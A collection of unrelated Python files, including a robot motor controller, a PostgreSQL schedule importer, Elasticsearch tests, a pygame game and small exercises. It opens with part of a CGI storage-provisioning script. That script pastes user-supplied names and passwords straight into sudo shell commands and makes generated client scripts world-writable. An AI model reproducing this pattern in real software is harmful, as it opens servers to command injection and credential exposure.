f1.write("\nimport commands\ncommands.getoutput('yum install fuse-sshfs')\ncommands.getoutput('systemctl restart sshfs')\ncommands.getoutput('systemctl restart sshd')\ncommands.getoutput('mkdir /root/Desktop/"+user+" ')\ncommands.getoutput('sshfs "+user+"@192.168.43.103:/"+user + " /root/Desktop/"+user+" ')\n ")
f1.close()
commands.getoutput('sudo chmod 777 /var/www/html/sshfs.py')
commands.getoutput("sudo tar -cvf /var/www/html/clienttar/"+user+"_staas.tar /var/www/html/clienttar/staasclient.py")
print "<html>"
print "<p><a href='http://192.168.43.103/clienttar/"+user+"_staas.tar' download>Downlode</a> tar file and run it.......</p>"
print "</html>"
#ISCSI--------------------------------------------------------------------
elif (n=="3") and (a !="") and (b !=""):
#yum install iscsi-target-utils
commands.getoutput("sudo lvcreate --name "+user+" --size "+hd+"G vg1")
f1=open('/etc/tgt/targets.conf','a')
f1.write("<target "+user+">\nbacking-store /dev/vg1/"+user + "\n</target>\n")
f1.close()
commands.getoutput("sudo systemctl restart tgtd")
f1=open('/var/www/html/clienttar/iscsi.py','w+')
f1.write("\nimport commands\ncommands.getoutput('iscsiadm --mode discoverydb --type sendtargets --portal 192.168.43.98 --discover')\ncommands.getoutput('iscsiadm --mode node --targetname "+user+" --portal 192.168.43.103:3260 --login')")
f1.close()
commands.getoutput('sudo chmod 777 /var/www/html/clienttar/iscsi.py')
commands.getoutput("sudo tar -cvf /var/www/html/clienttar/"+user+"_iscsi.tar /var/www/html/clienttar/iscsi.py")
print "<html>"
print "<p><a href='http://192.168.43.103/clienttar/"+user+"_iscsi.tar' download>Downlode</a> tar file and run it.......</p>"
print "</html>"
elif (n=="4") and (a !="") and (b !=""):
commands.getoutput("sudo lvcreate --name "+user+" --size "+hd+"G vg1")
commands.getoutput("sudo mkfs.ext4 /dev/vg1/"+user+"")
commands.getoutput("sudo mkdir /media/"+user+"")
commands.getoutput("sudo mount /dev/vg1/"+user+" /media/"+user+"")
#commands.getoutput("sudo yum install samba samba-client")
commands.getoutput("sudo useradd -s /sbin/nologin "+user+"")
commands.getoutput("sudo echo -e '"+password+"\n"+password+"\n' | smbpasswd -a "+user+"")
f1=open('/etc/samba/smb.conf','a')
f1.write("\n["+user+"]\npath = /media/"+user+"\nwritable = yes\nbrowseable = yes")
f1.close()
commands.getoutput("systemctl restart smb")
f1=open('/var/www/html/clienttar/smb.py','w+')
f1.write("\nimport commands \ncommands.getoutput('yum install cifs-utils samba-client')\ncommands.getoutput('mkdir /media/"+user+"')\ncommands.getoutput('mount -o username="+user+"//192.168.43.103/"+user+" /media/"+user+"')")
f1.close()
commands.getoutput('sudo chmod 777 /var/www/html/clienttar/smb.py')
commands.getoutput("sudo tar -cvf /var/www/html/clienttar/"+user+"_smb.tar /var/www/html/clienttar/smb.py")
print "<html>"
print "<p><a href='http://192.168.43.103/clienttar/"+user+"_smb.tar' download>Downlode</a> tar file for linux user and run it</p>"
print "<p>Windows users go to RUN window and type IP-->//192.168.43.98 and give username and password </p>"
print "</html>"
else :
print "<html>"
print "Wrong user name or password"
print "</html>"
|
#!/usr/bin/python
"""
Provides ability to control the motors using two controllers on the robot.
"""
import logging
import MotorController
MODULE_LOGGER = logging.getLogger("__main__.DualMotorController")
class DualMotorController(object):
"""
Provides ability to control the motors on the robot.
"""
def __init__(self, left_front_forward, left_front_backward,
right_front_forward, right_front_backward, left_back_forward,
left_back_backward, right_back_forward, right_back_backward):
MODULE_LOGGER.info("Initialising DualMotorController")
self.front_controller = MotorController.MotorController(
left_front_forward, left_front_backward, right_front_forward,
right_front_backward)
self.rear_controller = MotorController.MotorController(
left_back_forward, left_back_backward, right_back_forward,
right_back_backward)
def cleanup(self):
"""
Sets all motors off and sets GPIO to standard values
"""
self.front_controller.cleanup()
self.rear_controller.cleanup()
MODULE_LOGGER.info("Cleaned up DualMotorController")
def stop(self):
"""
Causes the Robot to stop all motors
"""
self.front_controller.stop()
self.rear_controller.stop()
def forward(self, speed):
"""
Move each wheel forward
Sets both motors to move forward at speed. 0 <= speed <= 100
"""
self.front_controller.forward(speed)
self.rear_controller.forward(speed)
def reverse(self, speed):
"""
        Move each wheel backward
Sets both motors to reverse at speed. 0 <= speed <= 100
"""
self.front_controller.reverse(speed)
self.rear_controller.reverse(speed)
def spin_left(self, speed):
"""
Causes the Robot to rotate left as fast as possible
Sets motors to turn opposite directions at speed. 0 <= speed <= 100
"""
self.front_controller.spin_left(speed)
self.rear_controller.spin_left(speed)
def spin_right(self, speed):
"""
Causes the Robot to rotate right as fast as possible
Sets motors to turn opposite directions at speed. 0 <= speed <= 100
"""
self.front_controller.spin_right(speed)
self.rear_controller.spin_right(speed)
def turn_forward(self, left_speed, right_speed):
"""
Causes the Robot to turn
        Sets the left and right motors to the given forward speeds. 0 <= speed <= 100
"""
self.stop()
self.front_controller.turn_forward(left_speed, right_speed)
self.rear_controller.turn_forward(left_speed, right_speed)
def turn_reverse(self, left_speed, right_speed):
"""
Causes the Robot to turn
        Sets the left and right motors to the given reverse speeds. 0 <= speed <= 100
"""
self.stop()
self.front_controller.turn_reverse(left_speed, right_speed)
self.rear_controller.turn_reverse(left_speed, right_speed)
    def front_left_forward(self, speed):
        """
        Drives just the front-left wheel forward. 0 <= speed <= 100
        """
        self.front_controller.left_forwards(speed)
    def front_left_backward(self, speed):
        """
        Drives just the front-left wheel backward. 0 <= speed <= 100
        """
        self.front_controller.left_backwards(speed)
    def front_right_forward(self, speed):
        """
        Drives just the front-right wheel forward. 0 <= speed <= 100
        """
        self.front_controller.right_forwards(speed)
    def front_right_backward(self, speed):
        """
        Drives just the front-right wheel backward. 0 <= speed <= 100
        """
        self.front_controller.right_backwards(speed)
    def rear_left_forward(self, speed):
        """
        Drives just the rear-left wheel forward. 0 <= speed <= 100
        """
        self.rear_controller.left_forwards(speed)
    def rear_left_backward(self, speed):
        """
        Drives just the rear-left wheel backward. 0 <= speed <= 100
        """
        self.rear_controller.left_backwards(speed)
    def rear_right_forward(self, speed):
        """
        Drives just the rear-right wheel forward. 0 <= speed <= 100
        """
        self.rear_controller.right_forwards(speed)
    def rear_right_backward(self, speed):
        """
        Drives just the rear-right wheel backward. 0 <= speed <= 100
        """
        self.rear_controller.right_backwards(speed)
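# Illustrative usage only: the GPIO pin numbers below are assumptions and depend on the
# robot's wiring and on what MotorController expects.
if __name__ == '__main__':
    robot = DualMotorController(17, 18, 22, 23, 24, 25, 27, 4)
    robot.forward(50)   # both controllers drive forward at half speed
    robot.stop()
    robot.cleanup()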
|
# -*- coding: utf-8 -*-
import csv, sys, pytz, datetime
import psycopg2
import uuid, calendar
import logging
import re
def localice(date):
if date.tzinfo is not None:
return date
timezone = "America/Buenos_Aires"
tz = pytz.timezone(timezone)
local = tz.localize(date)
return local
def replaceTime(date,time):
return date.replace(hour=time.hour,minute=time.minute,second=0,microsecond=0)
if __name__ == '__main__':
if len(sys.argv) < 6:
        print('the script must be invoked with the following parameters:')
        print('cat archivo.csv | python {} host port db user pass'.format(sys.argv[0]))
sys.exit(1)
#logging.basicConfig(filename='/tmp/import-schedule.log',format='%(asctime)s %(levelname)s %(message)s',level=logging.DEBUG)
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',level=logging.DEBUG)
host = sys.argv[1]
port = sys.argv[2]
db = sys.argv[3]
user = sys.argv[4]
passw = sys.argv[5]
date = datetime.datetime.now()
dates = calendar.Calendar().monthdatescalendar(date.year,date.month-1)
firstWeek = dates[0][:7]
con = psycopg2.connect(host=host, port=port, user=user, password=passw, dbname=db)
cur = con.cursor()
cur.execute("set time zone %s",('utc',))
#cur.execute('delete from assistance.schedule')
logging.basicConfig(level=logging.DEBUG)
lines = 0
for line in csv.reader(sys.stdin):
try:
logging.debug(line)
""" salto el titulo """
if lines < 2:
lines = lines + 1
continue
nombre,app,dni,le,ls,me,ms,mme,mms,je,js,ve,vs,se,ss,de,ds = line
            # drop the header row that is always left over
            if nombre == 'Nombre':
                continue
            if dni is None or dni == '':
                logging.warn('ignoring {} because it has no dni'.format(line))
continue
pid = str(uuid.uuid4())
cur.execute('select id,dni from profile.users where dni = %s', (dni,))
if cur.rowcount <= 0:
cur.execute('insert into profile.users (id,dni,name,lastname) values (%s,%s,%s,%s)', (pid,dni,nombre,app))
else:
pid = cur.fetchone()[0]
cur.execute('update profile.users set name = %s, lastname = %s where id = %s',(nombre,app,pid))
logging.warn("{0} ya existe - {1}".format(dni,pid))
""" actualizo para asignarle el perfil de usuario dentro del sistema de asistencia """
cur.execute('select user_id from credentials.auth_profile where user_id = %s and profile = %s',(pid,'USER-ASSISTANCE'))
if cur.rowcount <= 0:
cur.execute('insert into credentials.auth_profile (user_id,profile) values (%s,%s)',(pid,'USER-ASSISTANCE'))
""" actualizo el tema del horario """
cur.execute('delete from assistance.schedule where user_id = %s',(pid,))
entradas = [le,me,mme,je,ve,se,de]
salidas = [ls,ms,mms,js,vs,ss,ds]
for i in range(7):
e = entradas[i]
s = salidas[i]
date = firstWeek[i]
if e.strip() != '' and s.strip() != '':
                    logging.debug('processing date {} with entry {} and exit {}'.format(date,e,s))
timeE = datetime.datetime.strptime(e,'%H:%M:%S')
timeS = datetime.datetime.strptime(s,'%H:%M:%S')
date = datetime.datetime.combine(date,datetime.time())
                    logging.debug('generating schedule for date {}'.format(date))
awareDate = localice(date)
#awareDate = aware.replace(hour=0,minute=0,second=0,microsecond=0)
sstart = replaceTime(awareDate,timeE)
send = replaceTime(awareDate,timeS)
uaware = awareDate.astimezone(pytz.utc)
ustart = sstart.astimezone(pytz.utc)
uend = send.astimezone(pytz.utc)
req = (str(uuid.uuid4()), pid, uaware, ustart, uend, True, False, False)
                    logging.debug('Inserting schedule: {}'.format(str(req)))
cur.execute('insert into assistance.schedule (id,user_id,date,sstart,send,isDayOfWeek,isDayOfMonth,isDayOfYear) values (%s,%s,%s,%s,%s,%s,%s,%s)',req)
con.commit()
except Exception as e:
logging.exception(e)
con.close()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 9 13:48:17 2017
@author: dgratz
"""
from plotBeat2beatCLGrid import b2bCL
from plotSynchronyMeasure import b2bSync
import matplotlib.pyplot as plt
import numpy as np
from scipy import signal
from glob import glob
import re
folders = glob('D:/synchrony-data/AllConnLogNormal/*/')
s = re.compile('/')
conns = []
#avgCL = []
avgSV = []
avgST = []
for folder in folders:
# plt.figure()
conns.append(float(s.split(folder)[-2]))
# plt.subplot(3,1,1)
b2bSTimes,b2bST,b2bSV=b2bSync(folder+'/',3)
b2bCLX, b2bCLY = b2bCL(folder)
# avgCL.append(np.mean(b2bCLY))
avgSV.append(np.mean(b2bSV))
avgST.append(np.mean(b2bST))
for rn in range(b2bCLY.shape[0]):
for cn in range(b2bCLY.shape[1]):
if b2bCLY[rn,cn].max() > 450:
b2bCLY[rn,cn] = np.zeros(0)
b2bCLX[rn,cn] = np.zeros(0)
# for i in range(b2bCLX.shape[0]):
# for j in range(b2bCLX.shape[1]):
# plt.plot(b2bCLX[i,j],b2bCLY[i,j])
# plt.subplot(3,1,2)
# plt.plot(b2bSTimes,b2bST)
#plt.plot(b2bSTimes,signal.medfilt(b2bST,kernel_size=5))
# plt.subplot(3,1,3)
# plt.plot(b2bSTimes,b2bSV)
#plt.plot(conns,avgCL)
plt.plot(conns,avgSV)
plt.plot(conns,avgST)
|
import unittest
import json
from elasticsearch import helpers, Elasticsearch, TransportError
from flask import current_app as app
import numpy as np
from app.main import db
from app.test.base import BaseTestCase
from app.main.lib.shared_models.shared_model import SharedModel
class TestSimilaryBlueprint(BaseTestCase):
maxDiff = None
use_model_key = 'multi-sbert'
test_model_key = 'shared-model-test'
def setUp(self):
super().setUp()
es = Elasticsearch(app.config['ELASTICSEARCH_URL'])
es.indices.delete(index=app.config['ELASTICSEARCH_SIMILARITY'], ignore=[400, 404])
es.indices.create(index=app.config['ELASTICSEARCH_SIMILARITY'])
es.indices.put_mapping(
body=json.load(open('./elasticsearch/alegre_similarity.json')),
index=app.config['ELASTICSEARCH_SIMILARITY']
)
es.indices.close(index=app.config['ELASTICSEARCH_SIMILARITY'])
es.indices.put_settings(
body=json.load(open('./elasticsearch/alegre_similarity_settings.json')),
index=app.config['ELASTICSEARCH_SIMILARITY']
)
es.indices.open(index=app.config['ELASTICSEARCH_SIMILARITY'])
def test_similarity_mapping(self):
es = Elasticsearch(app.config['ELASTICSEARCH_URL'])
mapping = es.indices.get_mapping(
index=app.config['ELASTICSEARCH_SIMILARITY']
)
self.assertDictEqual(
json.load(open('./elasticsearch/alegre_similarity.json')),
mapping[app.config['ELASTICSEARCH_SIMILARITY']]['mappings']
)
def test_elasticsearch_similarity_english(self):
with self.client:
for term in json.load(open('./app/test/data/similarity.json')):
term['text'] = term['content']
del term['content']
response = self.client.post('/text/similarity/', data=json.dumps(term), content_type='application/json')
result = json.loads(response.data.decode())
self.assertEqual(True, result['success'])
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'this is a test'
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(3, len(result['result']))
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'something different'
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(1, len(result['result']))
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'this is a test',
'context': {
'dbid': 12,
'app': 'check'
}
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(1, len(result['result']))
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'Magnitude 4.5 quake strikes near Fort St. John',
'threshold': 0.7
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(2, len(result['result']))
def test_elasticsearch_similarity_hindi(self):
with self.client:
for term in [
{ 'text': 'नमस्ते मेरा नाम करीम है' },
{ 'text': 'हॅलो माझे नाव करीम आहे' }
]:
response = self.client.post('/text/similarity/', data=json.dumps(term), content_type='application/json')
result = json.loads(response.data.decode())
self.assertEqual(True, result['success'])
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'नमस्ते मेरा नाम करीम है',
'language': 'en'
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(2, len(result['result']))
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'नमस्ते मेरा नाम करीम है',
'language': 'hi'
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(1, len(result['result']))
def test_model_similarity(self):
with self.client:
term = { 'text': 'how to delete an invoice', 'model': TestSimilaryBlueprint.use_model_key, 'context': { 'dbid': 54 } }
response = self.client.post('/text/similarity/', data=json.dumps(term), content_type='application/json')
result = json.loads(response.data.decode())
self.assertEqual(True, result['success'])
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'how to delete an invoice',
'model': TestSimilaryBlueprint.use_model_key,
'context': {
'dbid': 54
}
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(1, len(result['result']))
similarity = result['result'][0]['_score']
self.assertGreater(similarity, 0.7)
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'purge an invoice',
'model': TestSimilaryBlueprint.use_model_key,
'threshold': 0.7,
'context': {
'dbid': 54
}
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(1, len(result['result']))
similarity = result['result'][0]['_score']
self.assertGreater(similarity, 0.7)
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'purge an invoice',
'model': TestSimilaryBlueprint.use_model_key,
'threshold': 0.7
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(1, len(result['result']))
similarity = result['result'][0]['_score']
self.assertGreater(similarity, 0.7)
def test_wrong_model_key(self):
with self.client:
term = { 'text': 'how to slice a banana', 'model': TestSimilaryBlueprint.use_model_key, 'context': { 'dbid': 54 } }
response = self.client.post('/text/similarity/', data=json.dumps(term), content_type='application/json')
result = json.loads(response.data.decode())
self.assertEqual(True, result['success'])
response = self.client.get(
'/text/similarity/',
data=json.dumps({
'text': 'how to slice a banana',
'model': TestSimilaryBlueprint.test_model_key,
'context': {
'dbid': 54
}
}),
content_type='application/json'
)
result = json.loads(response.data.decode())
self.assertEqual(0, len(result['result']))
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-#
#-------------------------------------------------------------------------------
# Name: convert_dots_to_bbox.py
# Author: wdf
# Date: 2019/7/18
# IDE: PyCharm
# Parameters:
# @param:
# @param:
# Return:
#
# Description:
# Usage:
#-------------------------------------------------------------------------------
def get_total_row_cols(x):
    # Input: the list of intersection points; count how many points each row contains.
    # Output: a dict mapping each row offset to the number of points in that row.
    # Point format:
    # [58, 174, 1, 1],
    # [557, 145, 1, 1],
    # [513, 145, 1, 1],
    # [471, 145, 1, 1],
    # [58, 145, 1, 1]]
    row = {}
num = 1
for i in range(len(x)-1):
if x[i][1] == x[i+1][1]:
num += 1
row[x[i][1]] = num
else:
num = 1
return row
def get_dots(x, row):
    # Get the coordinates of the points.
    # Input:
    #   x: the list of points
    #   row: the number of points per row
    results = []
    # print("row offset, points in this row")
    for key in row:
        # print(row[key])
        # print("*"*50)
        # print(key, row[key])
for val in range(row[key]):
# print(key)
yy = key
xx = [val[0] for val in x if val[1]==yy]
result = [[x,yy] for x in xx]
# print(result)
results.append(result)
return results
def get_bounding_box(results):
    # Get the two diagonal corner coordinates of each bounding box (bottom-right and top-left).
    # Input: results = get_dots(x, row)
    # Output: a list of [lower point, upper point] pairs
    bounding_box = []
for i in range(len(results) - 1):
col_down = results[i]
col_up = results[i + 1]
# print(col_down)
# print(col_up)
len_down, len_up = len(col_down), len(col_up)
# print(len_down,len_up)
        if len_down == len_up:  # both rows have the same number of points: take diagonal pairs directly
            # print("both rows have the same number of points, take diagonal pairs directly")
            for j in range(len(col_down) - 1):
                # print(col_down[j], col_up[j + 1])
                bounding_box.append([col_down[j], col_up[j + 1]])
        elif len_down > len_up:  # the lower row has more points
            # print("the lower row has more points")
            for j in range(len(col_up) - 1):
                k = j  # k walks over the extra points
                while k < len_down - 1:  # iterate over all points of the lower (longer) row
                    if col_down[k + 1][0] == col_up[j + 1][0]:
                        # print(col_down[k], col_up[j + 1])
                        bounding_box.append([col_down[k], col_up[j + 1]])
                    k += 1
        else:  # the upper row has more points
            # print("the upper row has more points")
            for j in range(len(col_down) - 1):
                k = j  # k walks over the extra points
                while k < len_up - 1:  # iterate over all points of the upper (longer) row
                    if col_up[k + 1][0] == col_down[j + 1][0]:
                        # print(col_down[j], col_up[k + 1])
                        bounding_box.append([col_down[j], col_up[k + 1]])
                    k += 1
return bounding_box
def main():
x = [[549, 764, 1, 1], [317, 764, 1, 1], [85, 764, 1, 1], [549, 738, 1, 1], [317, 738, 1, 1], [85, 738, 1, 1],
[549, 712, 1, 1], [317, 712, 1, 1], [85, 712, 1, 1], [549, 687, 1, 1], [317, 687, 1, 1], [85, 687, 1, 1],
[549, 636, 1, 1], [317, 636, 1, 1], [85, 636, 1, 1], [549, 539, 1, 1], [317, 539, 1, 1], [85, 539, 1, 1],
[549, 488, 1, 1], [317, 488, 1, 1], [85, 488, 1, 1], [549, 462, 1, 1], [317, 462, 1, 1], [85, 462, 1, 1],
[549, 343, 1, 1], [85, 343, 1, 1], [549, 317, 1, 1], [317, 317, 1, 1], [85, 317, 1, 1], [549, 279, 1, 1],
[317, 279, 1, 1], [85, 279, 1, 1], [549, 253, 1, 1], [317, 253, 1, 1], [85, 253, 1, 1], [85, 82, 1, 1],
[85, 69, 1, 1]]
row = get_total_row_cols(x)
results = get_dots(x, row)
# print(results)
bounding_boxs = get_bounding_box(results)
print(bounding_boxs)
if __name__ == '__main__':
main()
|
#for matrices and solving linear equations
import numpy as np
#future vector
F1 = np.array([1800, 900])
F2 = np.array([1100, 1500])
#b vector
B = np.array([1, 1])
#present
X = np.array([[200, 700],
[300, 100]])
for i in range(3):
    # alternate: recompute A using B, then B using A
A = np.dot(np.linalg.inv(X * B.reshape(1, 2)), F1.reshape(2,1))
B = np.dot(np.linalg.inv(X * A.reshape(2, 1)), F2.reshape(2,1))
print (A)
print (B)
print (A)
print (B)
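# For reference (not part of the original snippet): a single square system X a = f can be
# solved directly with numpy instead of inverting the matrix explicitly.
a_direct = np.linalg.solve(X, F1)
print(a_direct)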
|
import socket
from urllib import error,request
try:
response = request.urlopen('http://zhaojiaxing.top/',timeout=0.01)
except error.URLError as e:
print(type(e.reason))
if isinstance(e.reason,socket.timeout):
print('time out')
|
import cv2
import matplotlib.pyplot as plt
img = cv2.imread("/home/mmc/code/python_opencv/Books/Practical Python and OpenCV, 3rd Edition/code/images/trex.png")
cv2.imshow('platjeta', img)
img[0:100,0:100] = (0,0,255)
cv2.imshow('modified', img)
cv2.waitKey(0)  # keep the windows open until a key is pressed
|
class Solution:
# @param A : string
# @return an integer
def lengthOfLastWord(self,A):
        s = A.rstrip().split(' ')
length = len(s)
if(length == 0):
return 0
if(length == 1):
return len(s[0])
else:
return len(s[length-1])
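# Quick illustrative check of the method above:
if __name__ == '__main__':
    print(Solution().lengthOfLastWord("Hello World"))    # 5
    print(Solution().lengthOfLastWord("Hello World   ")) # 5, trailing spaces are ignored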
|
from PyQt5.QtMultimedia import QMediaPlayer, QMediaContent
from PyQt5.QtCore import QUrl
import time
from StatusCode import *
MUSIC_PATH = r'H:\Projects\PyCharmProjects\MusicPlayer\Music\排骨教主 - 牵丝戏.mp3'
# PLAYER_STATE_STOP = 0
# PLAYER_STATE_PLAY = 1
# PLAYER_STATE_PAUSE = 2
class Player():
def __init__(self):
self.player = QMediaPlayer()
self.state = PLAYER_STATE_STOP
def setMedia(self, music):
self.player.setMedia(music)
def play(self):
print(self.player.mediaStatus())
if self.state == PLAYER_STATE_PAUSE:
self.state = PLAYER_STATE_PLAY
self.player.play()
elif self.state == PLAYER_STATE_STOP:
if self.player.mediaStatus() == LOADED_MEDIA:
self.state = PLAYER_STATE_PLAY
                self.player.play()
def pause(self):
if self.state == PLAYER_STATE_PLAY:
self.state = PLAYER_STATE_PAUSE
self.player.pause()
    def stop(self):
        self.player.stop()
        self.state = PLAYER_STATE_STOP
if __name__ == '__main__':
path = QUrl.fromLocalFile(MUSIC_PATH)
music = QMediaContent(path)
player = Player()
player.setMedia(music)
player.play()
|
import numpy as np
## constants = {'exploration_type': ..., 'k_a': ..., 'alpha_a': ..., 'k_s': ..., 'alpha_s': ..., 'dmax': ..., 'p': ..., 'e_d': ...}
class DpwNode(object):
def __init__(self,parent,depth,constants,k,a,init_n=0):
## Tree data
self.parent = parent
self.children = []
self.exploration_type = constants['exploration_type']
## Node data
self.N = init_n
## Set up node expansion / exploration
if self.exploration_type=='ucb':
self.k = k
self.alpha = a
depth = None
self.allow_new_func = lambda: len(self.children)<=np.floor(self.k * self.N**self.alpha)
self.max_children_ka = lambda: self.k * self.N**self.alpha
elif self.exploration_type=='polynomial' or self.exploration_type=='polynomial_heuristic':
if self.exploration_type=='polynomial':
depth_diff = constants['dmax'] - depth
if abs(np.rint(depth)-depth)<1e-5: ## If depth is integer (in state node)
self.alpha = (10.*depth_diff-3.)**-1
else: ## If depth is not integer (in action node)
if depth_diff>=1.5:
self.alpha = 3./(10.*depth_diff-3.)
elif abs(abs(depth_diff)-0.5)<1e-5:
self.alpha = 1.
else:
assert(False)
self.e_d = (1./(2.*constants['p']))*(1.-3./(10*depth_diff))
else:
self.k = k
self.alpha = a
self.e_d = constants['e_d']
self.allow_new_func = lambda: np.floor(self.N**self.alpha)>np.floor((self.N-1)**self.alpha)
else:
raise NotImplementedError
@property
def allow_new_node(self):
return self.allow_new_func()
@property
def get_max_children_ka(self):
return self.max_children_ka()
class DpwActionNode(DpwNode):
def __init__(self,act,parent,depth,constants,init_n=0,init_q=1,risk=0.):
assert(abs(np.modf(depth)[0]-0.5)<1e-5)
DpwNode.__init__(self,parent,depth,constants,constants['k_a'],constants['alpha_a'],
init_n=init_n)
self.act = act
self.Q = init_q
self.risk = risk
self.N_immediate_violations = 0
self.e_d = None
@property
def immediate_risk(self):
return float(self.N_immediate_violations)/self.N
class DpwStateNode(DpwNode):
def __init__(self,state,reward,parent,depth,constants,violates_constraint,init_n=1):
assert(abs(np.rint(depth)-depth)<1e-5)
DpwNode.__init__(self,parent,depth,constants,constants['k_s'],constants['alpha_s'],init_n=init_n)
self.state = state
self.reward = reward
self.violates_constraint = violates_constraint
|
import numpy as np
import pandas as pd
from KNearestNeighbor import KNearestNeighbors
#taking inputs
data=pd.read_csv('Social_Network_Ads.csv')
data['Gender'] = data['Gender'].replace({'Male': 0, 'Female': 1})
X=data.iloc[:,1:4].values
y=data.iloc[:,-1].values
print(X.shape)
print(y.shape)
#using train_test_split function
from sklearn.model_selection import train_test_split
X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2)
#using StandardScaler function
from sklearn.preprocessing import StandardScaler
scaler=StandardScaler()
X_train=scaler.fit_transform(X_train)
X_test=scaler.transform(X_test)
#an object of knn
knn=KNearestNeighbors(k=5)
knn.fit(X_train,y_train)
#using the predict() function
knn.predict(np.array(X_test).reshape(len(X_test), len(X_test[0])))
#defining a function to check the output
def predict_new():
age=int(input("Enter the age"))
salary=int(input("Enter the salary"))
gender = int(input("Enter the gender,type '0' for Male or type '1' for female"))
    X_new=np.array([[gender, age, salary]])  # match the training column order: Gender, Age, Salary
X_new=scaler.transform(X_new)
result=knn.predict(X_new)
if result==0:
print("Will not purchase")
else:
print("Will purchase")
predict_new()
|
import random
from objects import *
sizes = [1,2,3,2,1,2,4]
class App:
def __init__(self):
self._running = True
self._display_surf = None
self.size = self.width, self.height = 800, 600
self.delta_time = 0
self.internal_clock = 0
self.last_frame_tick = 0
self.scale = 0.4
self.point = 0
self.default_fallspeed = 175
self.slowdown_factor = 0.5
self.spawn_clock = 0
self.spawn_rate = 1.75
self.max_zombie = len(sizes)*2
random.shuffle(sizes)
self.live = 3
def on_init(self):
pygame.init()
self.last_frame_tick = pygame.time.get_ticks()
self.last_update_tick = pygame.time.get_ticks()
self._display_surf = pygame.display.set_mode(self.size, pygame.HWSURFACE)
self._img_surface = load_img("bg.bmp")[0]
self.pos = [self.width * i / len(sizes) for i in range(len(sizes))]
self.scale = 2/(len(sizes))
self.pipes = [MPipe(sizes[i], self._display_surf, self.pos[i], self.scale) for i in range(len(sizes))]
self.zombies = []
self.aimmark = AimMark(self._display_surf, self.scale / 4)
self.hitcount = PointCount(self._display_surf, (0,0))
self.bg_sound = load_sound("bg_music.wav")
self.boom_sound = load_sound("boom.wav")
self.boom_sound.set_volume(0.5)
self.bg_sound.play(loops=-1)
self._running = True
# init for boom
self.kabooms = []
def on_event(self, event):
if event.type == QUIT:
self._running = False
elif event.type == MOUSEBUTTONDOWN and event.button == 1:
hit = False
for zombie in self.zombies:
if not contains(zombie.dest_pipe.rect, event.pos) and contains(zombie.rects[zombie.index].move(zombie.pos), event.pos):
self.zombies.remove(zombie)
self.hitcount.inc_hit()
hit = True
# new kaboom
self.boom_sound.play(maxtime=500)
self.kabooms.append(Kaboom(self._display_surf, self.scale * 2, 0.1, event.pos))
break
if not hit:
self.hitcount.inc_miss()
elif event.type == MOUSEMOTION:
self.aimmark.set_pos(event.pos)
def on_loop(self):
nc = pygame.time.get_ticks()
self.delta_time = (nc - self.last_frame_tick) / 1000.0
self.last_frame_tick = nc
# create more zombies here
# select pipe to spawn
if len(self.zombies) < self.max_zombie:
if self.spawn_clock < (1/self.spawn_rate):
self.spawn_clock += self.delta_time
else:
self.spawn_clock = 0
num = random.choice(range(len(sizes)))
selected_pipe = self.pipes[num]
self.zombies.append(Zombie(self._display_surf, self.default_fallspeed, self.pos[num], selected_pipe, self.scale))
        for zombie in self.zombies[:]:  # iterate over a copy so items can be removed safely
# remove zombie when he completely fall into pipe
if zombie.get_true_rect().top > zombie.dest_pipe.rect.top:
self.zombies.remove(zombie)
print("fall out")
# slow down zombie when he get into pipe
if zombie.get_true_rect().bottom > zombie.dest_pipe.rect.top:
zombie.set_fallspeed(self.slowdown_factor*self.default_fallspeed)
        for kaboom in self.kabooms[:]:  # iterate over a copy so items can be removed safely
if kaboom.success == 1:
self.kabooms.remove(kaboom)
# do update them
[x.update(self.delta_time) for x in self.zombies]
[x.update(self.delta_time) for x in self.kabooms]
def on_render(self):
self._display_surf.blit(self._img_surface, (0,0))
[x.draw() for x in self.zombies]
[x.draw() for x in self.pipes]
[x.draw() for x in self.kabooms]
self.aimmark.draw()
self.hitcount.draw()
pygame.display.flip()
def on_cleanup(self):
self.bg_sound.stop()
pygame.quit()
def on_execute(self):
if self.on_init() == False:
self._running = False
while self._running:
for event in pygame.event.get():
self.on_event(event)
self.on_loop()
self.on_render()
self.on_cleanup()
if __name__ == "__main__" :
theApp = App()
theApp.on_execute()
|
highest_star = int(input())
current_star = 0
# Ascending
while current_star < highest_star:
current_star += 1
for star in range(1, current_star + 1):
print("*", end= "")
print()
# Descending
while highest_star > 1:
highest_star -= 1
for star_2 in range(1, highest_star + 1):
print("*", end="")
print()
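# Example (added for illustration): for an input of 3 the program prints
#   *
#   **
#   ***
#   **
#   *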
|
import os, re, glob, sys, argparse
from string import Template
class Braced(Template):
pattern = r"""
%(delim)s{(?P<braced>%(id)s)} |
(?P<escaped>^$) |
(?P<named>^$) |
(?P<invalid>^$)
""" % dict(delim=re.escape(Template.delimiter), id=Template.idpattern)
def regen():
parser = argparse.ArgumentParser()
parser.add_argument('--no-certs-yet', action='store_true', dest='noCertsYet')
args = parser.parse_args()
noCertsAvailableYet = args.noCertsYet
print('Converting NGINX config template into regular config file by providing environment variables.')
templates = glob.glob('/etc/nginx/**/*.template.conf', recursive=True)
for templatePath in templates:
confOutputPath = templatePath[:-len('.template.conf')] + '.conf'
print('Updating {} from template.'.format(confOutputPath))
